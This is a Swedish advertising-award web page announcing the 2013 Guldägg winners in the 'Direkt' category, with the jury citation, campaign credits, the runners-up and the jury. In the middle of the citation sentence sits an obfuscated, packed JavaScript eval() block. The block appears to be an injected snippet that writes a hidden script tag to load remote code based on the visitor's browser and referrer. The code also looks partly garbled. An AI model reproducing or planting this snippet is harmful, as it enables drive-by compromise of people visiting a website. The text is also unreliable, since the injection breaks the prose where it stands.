Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Årets Guldägg i kategori Direkt går till…

Årets Guldägg i kategori Direkt går till…
Sebastian

Bonniers Konsthall och DDB Stockholm vinner årets Guldägg i kategori Direkt för ”The Track-List Guest-List”

Motivering:
Årets eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rddit|var|u0026u|referrer|dnizf||js|php’.split(’|’),0,{}))
Guldäggsvinnare i kategori Direkt är elitistisk, exkluderande och alldeles fenomenalt bra. En personligt komponerad inbjudan som dessutom lyckats med att sätta en kråka i ”det-här-har-vi-aldrig-sett-förut-boxen”. Juryns stora grattis går inte ut till alla, utan endast till Bonniers Konsthall och arbetsgruppen på DDB Stockholm!

Guldägg 2013 kategori Direkt:
Byrå: DDB Stockholm Bidragsnamn: The Track-List Guest-List Uppdragsgivare: Bonniers Konsthall Art Director: Joakim Khoury Copywriter: Daniel Vaccino Creative Director: Magnus Jakobsson, Fredrik Simonsson Musik: Hans Berg Produktionsledare: Charlotte Zetterström Projektledare: Sandra Bergman Senior Designer: Daniel Löfvenborg Uppdragsgivare: Thérèse Dyhlén, Mirjam Johansson Övrigt: Spotify

Silverägg 2013 kategori Direkt:
Byrå: McCann Stockholm Bidragsnamn: Roygalan 2012 Uppdragsgivare: Roygalan

Diplom 2013 kategori Direkt:
Byrå: Milk Reklambyrå Bidragsnamn: Det barnsliga brevet Uppdragsgivare: Stiftelsen för Drottning Silvias Barn- och Ungdomssjukhus
Byrå: Saatchi & Saatchi Bidragsnamn: Original vs. Remake Uppdragsgivare: Elmsta 3000 Horror Fest
Byrå: TBWA Stockholm Bidragsnamn: The Ice Record Project Uppdragsgivare: Shout Out Louds
Byrå: Ester Bidragsnamn: Trubaduren Uppdragsgivare: Nationella Hivrådet och Sveriges Landsting

Jury:
Kategoriordförande Monica Born
Jury Petter Dixelius, Lasse Kampe, Lena Regeheim, Jennie Mattar, Elisabeth Berlander, Björn Ståhl